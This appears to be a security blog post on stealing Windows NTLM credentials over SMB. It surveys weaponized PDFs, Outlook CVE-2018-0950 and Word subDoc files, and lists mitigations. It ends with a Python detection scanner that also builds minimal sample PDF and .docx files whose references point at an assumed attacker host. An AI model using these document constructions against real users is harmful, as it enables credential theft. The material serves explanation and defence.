How to steal Windows login credentials by abusing the Server Message Block (SMB) protocol (Blackhat Pakistan, 2023)
Hackers, cybercriminals and cyberspies are constantly devising new techniques to improve their attacks; in some cases these methods are first discovered when threat actors use them in the wild.
Malicious emails are the privileged vector for hacking campaigns, and weaponized documents are the main ingredient of almost any spam or spear-phishing attack.
Weaponized documents are usually created to exploit specific vulnerabilities in applications running on the victims' computers, but in some cases they take advantage of native software features to launch a chain of attacks.
In this post, we will explore the main techniques to steal Windows credentials by exploiting the Server Message Block (SMB) protocol.
Weaponized PDF files
The first case I want to analyze was reported by Assaf Baharav, a security researcher at Check Point.
Baharav explained that threat actors can use weaponized PDF files to steal Windows credentials, specifically the associated NTLM hashes, without any user interaction beyond opening the file.
The researcher explained that attackers need to trick victims into opening a specially crafted file.
Rather than exploiting a vulnerability in Microsoft Word or RTF files, threat actors can use features natively contained in the PDF standard to steal NTLM hashes.
“An attacker can then use this to inject malicious content into the PDF so that when the PDF is opened, the target will automatically leak credentials in the form of an NTLM hash,” Baharav wrote.
The structure of a PDF file consists of several object types: booleans, numbers (integers and reals), strings, names, arrays, dictionaries, streams and the null object.
A dictionary object is a table containing pairs of objects, called entries (a key and a value). For his proof of concept, the researcher used a specially crafted PDF document with specific content inserted into these dictionary entries.
“By inserting a malicious entry (using the fields described above along with his SMB server details via the ‘/F’ key), an attacker can lure any target to open a crafted PDF file, which will then automatically leak their NTLM hash, challenge, user, hostname and domain details,” the expert added.
When the victim opens the PDF document, the viewer automatically contacts the remote SMB server controlled by the attacker; remember that the SMB connection attempt includes an NTLM authentication exchange, in which the client sends a response derived from the user's password hash.
“NTLM details are leaked through SMB traffic and sent to the attacker’s server, which can then be used to launch various SMB relay attacks,” the expert continues.
Using this trick, an attacker obtains the NTLM hash and can then use one of the tools available online to crack it offline and recover the original password.
This kind of attack is stealthy: the victim sees no prompt or error, so it is very hard to notice any abnormal behavior.
Figure 1 – SMB operation
Similar techniques based on SMB requests have been used by several threat actors in the past, but with other document types or operating system features (i.e., Office documents, shared-folder authentication, Outlook).
According to Check Point, almost every PDF viewer on Windows is affected by this security flaw and will expose NTLM credentials.
Baharav successfully tested the attack on Adobe Acrobat and Foxit Reader.
The researchers followed a 90-day disclosure policy and reported the vulnerability to both Adobe and Foxit.
Adobe responded that it will not fix the issue, as it considers it an operating-system-related bug; Foxit had not responded at the time.
Adobe refers to Microsoft Security Advisory ADV170014, released in October 2017, which introduces a mechanism, and provides guidance, for disabling NTLM SSO authentication to public (non-private) network resources on Windows.
Below is the response from Adobe:
“Thank you for reviewing this case. Microsoft released an optional security enhancement [0] late last year that gives customers the ability to disable NTLM SSO authentication as a method for public resources. With this mitigation available to customers, we do not plan to make changes to Acrobat.”
Windows Credential Theft Exploiting Microsoft Outlook Flaw
In November 2016, security researcher Will Dormann of the CERT Coordination Center (CERT/CC) reported to Microsoft a vulnerability in Microsoft Outlook, later identified as CVE-2018-0950.
Microsoft only partially fixed the bug almost 18 months later, with the April 2018 Patch Tuesday updates. The bug is related to the way Microsoft Outlook renders remotely hosted OLE content when previewing a Rich Text Format (RTF) email, which automatically initiates an SMB connection.
CVE-2018-0950 could be exploited by attackers to steal sensitive data, such as Windows credentials, simply by getting the victim to preview an email in Microsoft Outlook.
“Outlook blocks remote web content due to privacy risk of web bugs. But for rich text email, the OLE object is loaded without user interaction. Let’s look at the traffic in Wireshark to see what exactly is being leaked as a result of this automatic remote object fetching,” wrote Dormann.
In the attack scenario, a remote attacker exploits the vulnerability by sending an RTF email to the victim; the malicious message contains an image file (OLE object) that is retrieved from a remote SMB server under the attacker's control.
“Here we see that an SMB connection is auto-negotiated. The only action that triggers this negotiation is for Outlook to preview the email sent to it.”
The screenshot shows the victim's IP address, domain name, username, hostname and SMB session key leaking.
“Microsoft Outlook automatically loads remote OLE content when previewing an RTF email. When remote OLE content is hosted on an SMB/CIFS server, the Windows client system attempts to authenticate with the server using single sign-on (SSO),” according to CERT. “A user’s IP address, domain name, username, hostname, and password hash may be leaked. If the user’s password is not complex enough, an attacker can crack the password in a short time.”
Microsoft Outlook automatically renders the OLE content; that is, it initiates automatic authentication with the attacker-controlled remote server over the SMB protocol using single sign-on (SSO). This leaks the NTLMv2 hashed version of the password, which can be cracked offline with commercial tools and services.
Microsoft tried to fix the bug in its security updates, but the patch only stops Outlook from automatically initiating SMB connections when previewing RTF emails; other SMB attack paths remain feasible.
“It’s important to note that even with this patch, a user is still one click away from falling victim to the types of attacks described above,” Dormann added. “For example, if an email message has a UNC-style link that begins with ‘\\’, clicking the link will initiate an SMB connection to the specified server.”
Figure 3 – Partial fix
In short, installing Microsoft’s update for CVE-2018-0950 will not fully protect users from exploiting this issue.
Users are advised to apply the following mitigations:
- Install the Microsoft update for CVE-2018-0950.
- Block ports 445/tcp, 137/tcp, 139/tcp, 137/udp and 139/udp, used for SMB sessions, at the network perimeter (inbound and outbound).
- Block NT LAN Manager (NTLM) Single Sign-on (SSO) authentication to public resources (see ADV170014).
- Always use strong passwords.
- Never click on suspicious links embedded in emails.
Using Microsoft documents to steal Windows credentials
In January 2018, researchers at security firm Rhino Labs discovered that attackers could exploit a Microsoft Word feature called subDoc to retrieve NTLM hashes from Windows systems.
The attackers use a Word file that retrieves a subdocument from an SMB server controlled by the attacker.
Instead of delivering the requested subdocument, the attacker's SMB server requests authentication, and the victim's computer automatically sends an NTLM hash to authenticate against the fake domain.
This type of attack is very difficult to detect; as the experts explained, almost no antivirus software detected the weaponized documents used in this scheme at the time of discovery.
“Since this feature has not been publicly recognized as an attack vector for malicious actions, it is not something that antivirus software would recognize,” Rhino Labs experts said.
Rhino Labs has also released a tool called SubDoc Injector to generate subDoc weaponized Word files, allowing administrators to test the security of their infrastructure against these attacks.
The SubDoc Injector tool was developed by well-known ex-LulzSec member Hector “Sabu” Monsegur.
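What the weaponized PDF described earlier (an action dictionary whose /F key names the attacker's share) and the subDoc Word file have in common is an external file reference that resolves to a UNC path. The following scanner, added here as an example and not tooling from Check Point or Rhino Labs, looks for such references in an uncompressed PDF and in the relationship parts of a .docx package. The sample documents it builds are constructed, the host 10.0.0.5 is an assumption, and it only handles PDF literal strings outside compressed object streams (a production scanner would need to inflate FlateDecode streams and decode hex strings as well).

```python
"""Scan PDF and .docx files for external references that resolve to UNC paths,
the structural tell behind the weaponized-PDF (/F key) and Word subDoc techniques.
Added example, not Check Point's or Rhino Labs' tooling."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# "Remote" means a UNC path (\\host\share\...) or a file:// URL: both make the
# Windows client open an SMB connection and authenticate with NTLM.
UNC_RE = re.compile(r"^(?:\\\\[^\\]+\\|file://)", re.IGNORECASE)

# /F (literal string) inside an action or file-specification dictionary.
PDF_F_RE = re.compile(rb"/F\s*\(((?:\\.|[^\\)])*)\)")
_PDF_ESC = {b"n": b"\n", b"r": b"\r", b"t": b"\t"}
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def _pdf_unescape(raw: bytes) -> str:
    # Decode PDF literal-string escapes (\\, \(, \), \n, \r, \t); octal escapes are not handled.
    out, i = [], 0
    while i < len(raw):
        ch = raw[i:i + 1]
        if ch == b"\\" and i + 1 < len(raw):
            i += 1
            nxt = raw[i:i + 1]
            ch = _PDF_ESC.get(nxt, nxt)
        out.append(ch)
        i += 1
    return b"".join(out).decode("latin-1")


def scan_pdf(data: bytes):
    """Return [(action_type, path)] for every /F entry that points off-host."""
    hits = []
    for m in PDF_F_RE.finditer(data):
        path = _pdf_unescape(m.group(1))
        if not UNC_RE.match(path):
            continue
        # The action type (/S /GoToR, /GoToE, /Launch, ...) normally precedes /F in
        # the same dictionary; take the nearest one in a short window before it.
        kinds = re.findall(rb"/S\s*/(\w+)", data[max(0, m.start() - 80):m.start()])
        hits.append((kinds[-1].decode() if kinds else "?", path))
    return hits


def scan_docx(data: bytes):
    """Return [(relationship_type, target)] for external relationships on UNC paths."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(z.read(name)).iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and UNC_RE.match(target):
                    hits.append((rel.get("Type", "").rsplit("/", 1)[-1], target))
    return hits


# --- constructed samples (no real documents were used) -----------------------
def make_pdf(file_spec: bytes) -> bytes:
    """Minimal uncompressed PDF whose /OpenAction is a GoToR to file_spec."""
    return b"".join([
        b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R ",
        b"/OpenAction << /S /GoToR /F (", file_spec, b") /D [0 /Fit] >> >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
        b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
    ])


def make_docx(target: str, external: bool = True) -> bytes:
    """Minimal .docx whose body holds a subDoc whose relationship points at target."""
    mode = ' TargetMode="External"' if external else ""
    rels = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/subDocument" '
            f'Target="{target}"{mode}/></Relationships>')
    doc = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
           'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
           '<w:body><w:p><w:subDoc r:id="rId1"/></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", doc)
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # In the PDF literal string each backslash is itself escaped, hence the doubling.
    print(scan_pdf(make_pdf(rb"\\\\10.0.0.5\\share\\a.pdf")))        # assumed attacker host
    print(scan_docx(make_docx(r"\\10.0.0.5\share\sub.docx")))
```

A hit is a document that will make the viewer authenticate to a host the author chose, which is exactly the behaviour the three techniques on this page rely on; treating any external UNC or file:// reference in inbound documents as suspicious is a cheap mail-gateway rule that does not depend on antivirus signatures.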
Sources
- NTLM Credentials Theft via PDF Files
- Windows login credentials hack
- Microsoft Outlook
- Weaponized PDF hack Windows
- SSO exploitation guide
- Automatically Stealing Password Hashes with Microsoft Outlook
- Abusing Microsoft Word Features: Phishing